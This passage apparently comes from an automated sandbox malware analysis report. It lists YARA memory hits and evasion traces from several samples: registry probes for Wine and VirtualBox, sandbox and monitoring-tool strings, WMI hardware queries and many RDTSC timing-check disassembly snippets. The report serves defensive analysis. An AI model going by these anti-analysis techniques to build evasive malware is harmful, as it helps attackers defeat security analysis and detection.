                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Source: Yara matchFile source: 0000000E.00000002.4661857196.000000000324D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: vQeyqr1.exe PID: 6500, type: MEMORYSTR
                    Source: Yara matchFile source: 14.2.vQeyqr1.exe.1e610000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.vQeyqr1.exe.1e610000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000E.00000002.4777458351.000000001E610000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_2-9913
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Source: vQeyqr1.exe, 0000000E.00000002.4661857196.0000000002FB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: vQeyqr1.exe, 0000000E.00000002.4777458351.000000001E610000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE
                    Source: vQeyqr1.exe, 0000000E.00000002.4778915150.000000001E730000.00000004.08000000.00040000.00000000.sdmp, vQeyqr1.exe, 0000000E.00000000.2971558545.0000000000CA2000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: SBIEDLL.DLLCUAX9TQSFXQTYTRIMERTUG0XDL7QVZLW0LCF66FKMMCWMC4DSB2A6FUM0U0G83YILJEUCEFRZHDNF6HBC7BLW1KFKPIJGZQ7ONYTMHCSXAYATNBUIIW0ZFTWWLN7RNYPJOE3TPXUCM4MGIWJWJ3S6TIDEAWOVFIREFZKC5TDPRCBDLRJWKH2XORYMSM6BQYL8RL3QW1CGOYLCESGCJTKPS6Z4XDZQJWHGMCXDBQAV8KNPFCRBRACONBC45HYG3KJD2SCYBKVW07CRB1QCZUNGZISW3X4B20RIEDD373KDCBMZFVZMZCFO4GOLD8XMXYKITBIFKCDNJDY5IPRNM5MC0CLE7QUP5YCKBAKSCBAWHTJH26BWJ5DLBCBNRFH2CQEVMKCCTCPEPV0FB8RKFFK0BE7CNDT6DJTBQKWVDEIIPOGSJ7YB5ZUV7VWE4CPZ7VASNUUHFFMGJQSOLTH441ZELIXIRCRCUEEFLESNEXHBWT982K62KIGWYUPF8G7BGCOWRLAMTZFGCE9WMWQBE3FBYYIUHGGXALYINFO
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDEF23 second address: EDEF56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2385F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F08ED2385F9h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDEF56 second address: EDEF5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106368C second address: 1063690 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10528AD second address: 10528B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10528B1 second address: 10528C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F08ED2385E6h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10528C1 second address: 10528D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jnl 00007F08ED2F2E86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jns 00007F08ED2F2E86h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1062638 second address: 106266B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2385F4h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jng 00007F08ED2385E6h 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 jne 00007F08ED2385E6h 0x0000001e jnc 00007F08ED2385E6h 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1062955 second address: 106297C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F08ED2F2EA3h 0x0000000a jo 00007F08ED2F2E86h 0x00000010 jmp 00007F08ED2F2E97h 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1062C70 second address: 1062C76 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1062C76 second address: 1062C7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1065546 second address: 106554A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106554A second address: 1065561 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08ED2F2E93h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10655A7 second address: 10655AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1065715 second address: 1065719 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1065719 second address: 106577D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F08ED2385F8h 0x0000000c pop edi 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 pushad 0x00000012 mov ebx, 59BE442Bh 0x00000017 mov dword ptr [ebp+122D2B29h], ebx 0x0000001d popad 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ebx 0x00000023 call 00007F08ED2385E8h 0x00000028 pop ebx 0x00000029 mov dword ptr [esp+04h], ebx 0x0000002d add dword ptr [esp+04h], 00000014h 0x00000035 inc ebx 0x00000036 push ebx 0x00000037 ret 0x00000038 pop ebx 0x00000039 ret 0x0000003a or edx, dword ptr [ebp+122D3CF5h] 0x00000040 push DE569BE7h 0x00000045 push eax 0x00000046 push edx 0x00000047 push edi 0x00000048 jo 00007F08ED2385E6h 0x0000004e pop edi 0x0000004f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106577D second address: 1065783 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1065783 second address: 1065787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1065787 second address: 1065812 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 21A96499h 0x0000000f or dword ptr [ebp+122D2ADEh], eax 0x00000015 jnl 00007F08ED2F2E8Bh 0x0000001b push 00000003h 0x0000001d mov edi, dword ptr [ebp+122D3AD9h] 0x00000023 or edi, dword ptr [ebp+122D2C61h] 0x00000029 push 00000000h 0x0000002b jg 00007F08ED2F2E8Ch 0x00000031 mov dword ptr [ebp+122D2ADEh], eax 0x00000037 push 00000003h 0x00000039 push 00000000h 0x0000003b push edi 0x0000003c call 00007F08ED2F2E88h 0x00000041 pop edi 0x00000042 mov dword ptr [esp+04h], edi 0x00000046 add dword ptr [esp+04h], 00000019h 0x0000004e inc edi 0x0000004f push edi 0x00000050 ret 0x00000051 pop edi 0x00000052 ret 0x00000053 mov esi, dword ptr [ebp+122D3D35h] 0x00000059 call 00007F08ED2F2E89h 0x0000005e js 00007F08ED2F2E92h 0x00000064 jmp 00007F08ED2F2E8Ch 0x00000069 push eax 0x0000006a push eax 0x0000006b push edx 0x0000006c push ecx 0x0000006d jp 00007F08ED2F2E86h 0x00000073 pop ecx 0x00000074 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1065812 second address: 1065828 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08ED2385F2h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1065828 second address: 106584B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F08ED2F2E86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F08ED2F2E91h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106584B second address: 106585F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08ED2385F0h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106585F second address: 1065863 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1065A96 second address: 1065A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1055E71 second address: 1055E76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1084EF2 second address: 1084EF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1084EF6 second address: 1084EFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1084EFC second address: 1084F15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push edi 0x0000000c pop edi 0x0000000d ja 00007F08ED2385E6h 0x00000013 popad 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10855DE second address: 108561D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E96h 0x00000007 jmp 00007F08ED2F2E93h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push esi 0x00000010 pop esi 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 popad 0x00000014 push ebx 0x00000015 pushad 0x00000016 popad 0x00000017 pop ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a jg 00007F08ED2F2E86h 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1085865 second address: 108588E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ebx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b pushad 0x0000000c jmp 00007F08ED2385F9h 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10859EC second address: 10859F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1085B29 second address: 1085B2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1085B2E second address: 1085B50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F08ED2F2E86h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edx 0x0000000e push esi 0x0000000f jmp 00007F08ED2F2E91h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1085B50 second address: 1085B5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jnl 00007F08ED2385E6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1085E2C second address: 1085E32 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1085E32 second address: 1085E38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1079EB9 second address: 1079ED6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F08ED2F2E90h 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1085F83 second address: 1085F87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1085F87 second address: 1085F91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1086522 second address: 108655C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F08ED2385EDh 0x00000008 jmp 00007F08ED2385F8h 0x0000000d js 00007F08ED2385E6h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 jng 00007F08ED2385E6h 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108655C second address: 1086573 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F08ED2F2E8Bh 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1086573 second address: 1086582 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F08ED2385E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10866BD second address: 10866C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1086860 second address: 108686E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08ED2385EAh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108686E second address: 1086889 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10869C3 second address: 10869D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2385EAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
